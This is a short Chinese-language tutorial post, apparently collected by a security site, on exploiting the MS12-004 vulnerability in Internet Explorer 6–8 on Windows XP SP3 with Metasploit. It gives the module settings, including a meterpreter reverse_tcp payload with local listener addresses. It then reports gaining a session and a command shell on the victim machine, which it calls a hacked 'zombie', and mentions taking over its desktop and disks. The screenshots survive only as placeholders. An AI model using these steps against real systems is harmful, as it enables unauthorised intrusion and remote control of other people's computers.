use MS12-004 hacked XP

此漏洞针对windows xp3的IE6 IE7 IE8可行,show targets可以查看攻击平台
图片点击可在新窗口打开查看

设置好环境 set SRVHOST 本地监听ip

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST    本地监听IP
图片点击可在新窗口打开查看
图片点击可在新窗口打开查看

溢出成功,并且得到一个会话session,调用CMD(如果是metersploit pro版的话,可以直接控制肉鸡的桌面和磁盘)

图片点击可在新窗口打开查看

link:http://www.metasploit.com.cn/dispbbs.asp?boardid=12&replyID=144&ID=52&skin=1

网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。